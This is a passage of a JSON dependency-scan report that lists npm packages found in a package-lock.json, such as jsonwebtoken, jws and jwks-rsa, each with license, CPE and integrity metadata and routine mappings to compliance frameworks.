"nvd-cpe-dictionary" } ], "purl": "pkg:npm/json-bigint@1.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz", "integrity": "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==", "dependencies": { "bignumber.js": "^9.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "2a5374383b13cd28", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jsonwebtoken 9.0.3", "title": "jsonwebtoken 9.0.3", "description": "Package discovered: jsonwebtoken 9.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2ebcc52db7d200cb", "name": "jsonwebtoken", "version": "9.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:auth0:jsonwebtoken:9.0.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/jsonwebtoken@9.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.3.tgz", "integrity": "sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==", "dependencies": { "jws": "^4.0.1", "lodash.includes": "^4.3.0", "lodash.isboolean": "^3.0.3", "lodash.isinteger": "^4.0.4", "lodash.isnumber": "^3.0.3", "lodash.isplainobject": "^4.0.6", "lodash.isstring": "^4.0.1", "lodash.once": "^4.0.0", "ms": "^2.1.1", "semver": "^7.5.4" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "835e252fefb47867", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jwa 2.0.1", "title": "jwa 2.0.1", "description": "Package discovered: jwa 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "154697ca4fb19b8b", "name": "jwa", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jwa:jwa:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jwa@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jwa/-/jwa-2.0.1.tgz", "integrity": "sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==", "dependencies": { "buffer-equal-constant-time": "^1.0.1", "ecdsa-sig-formatter": "1.0.11", "safe-buffer": "^5.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "0c0a903cc4471d02", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jwks-rsa 3.2.2", "title": "jwks-rsa 3.2.2", "description": "Package discovered: jwks-rsa 3.2.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "014369d0efdc09b2", "name": "jwks-rsa", "version": "3.2.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jwks-rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jwks-rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jwks_rsa:jwks-rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jwks_rsa:jwks_rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jwks:jwks-rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:jwks:jwks_rsa:3.2.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jwks-rsa@3.2.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jwks-rsa/-/jwks-rsa-3.2.2.tgz", "integrity": "sha512-BqTyEDV+lS8F2trk3A+qJnxV5Q9EqKCBJOPti3W97r7qTympCZjb7h2X6f2kc+0K3rsSTY1/6YG2eaXKoj497w==", "dependencies": { "@types/jsonwebtoken": "^9.0.4", "debug": "^4.3.4", "jose": "^4.15.4", "limiter": "^1.1.5", "lru-memoizer": "^2.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5dd04dd82934e4bc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: jws 4.0.1", "title": "jws 4.0.1", "description": "Package discovered: jws 4.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7fed8e7a1bc916bb", "name": "jws", "version": "4.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:jws:jws:4.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/jws@4.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/jws/-/jws-4.0.1.tgz", "integrity": "sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==", "dependencies": { "jwa": "^2.0.1", "safe-buffer": "^5.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fdd5e753a1967298", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: leac 0.6.0", "title": "leac 0.6.0", "description": "Package discovered: leac 0.6.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9ec1624bf944fe34", "name": "leac", "version": "0.6.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:leac:leac:0.6.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/leac@0.6.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/leac/-/leac-0.6.0.tgz", "integrity": "sha512-y+SqErxb8h7nE/fiEX07jsbuhrpO9lL8eca7/Y1nuWV2moNlXhyd59iDGcRf6moVyDMbmTNzL40SUyrFU/yDpg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "63788a24cb56472a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lilconfig 3.1.3", "title": "lilconfig 3.1.3", "description": "Package discovered: lilconfig 3.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a8f0bd77b399e569", "name": "lilconfig", "version": "3.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lilconfig:lilconfig:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lilconfig@3.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-3.1.3.tgz", "integrity": "sha512-/vlFKAoH5Cgt3Ie+JLhRbwOsCQePABiU3tJ1egGvyQ+33R/vcwM2Zl2QR/LzjsBeItPt3oSVXapn+m4nQDvpzw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "90dd10f1ec21efdc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: limiter 1.1.5", "title": "limiter 1.1.5", "description": "Package discovered: limiter 1.1.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7ebb3add1191948c", "name": "limiter", "version": "1.1.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:limiter:limiter:1.1.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/limiter@1.1.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/limiter/-/limiter-1.1.5.tgz", "integrity": "sha512-FWWMIEOxz3GwUI4Ts/IvgVy6LPvoMPgjMdQ185nN6psJyBJ4yOpzqm695/h5umdLJg2vW3GR5iG11MAkR2AzJA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8108350690a84b91", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: linebreak 1.1.0", "title": "linebreak 1.1.0", "description": "Package discovered: linebreak 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "17b9850959841637", "name": "linebreak", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:linebreak:linebreak:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/linebreak@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/linebreak/-/linebreak-1.1.0.tgz", "integrity": "sha512-MHp03UImeVhB7XZtjd0E4n6+3xr5Dq/9xI/5FptGk5FrbDR3zagPa2DS6U8ks/3HjbKWG9Q1M2ufOzxV2qLYSQ==", "dependencies": { "base64-js": "0.0.8", "unicode-trie": "^2.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6d22d8e100269548", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: lines-and-columns 1.2.4", "title": "lines-and-columns 1.2.4", "description": "Package discovered: lines-and-columns 1.2.4", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2f4d4f332c0f6687", "name": "lines-and-columns", "version": "1.2.4", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:lines-and-columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines-and-columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines_and_columns:lines-and-columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines_and_columns:lines_and_columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines-and:lines-and-columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines-and:lines_and_columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines_and:lines-and-columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines_and:lines_and_columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines:lines-and-columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:lines:lines_and_columns:1.2.4:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/lines-and-columns@1.2.4", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "99a30188145ce555", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", 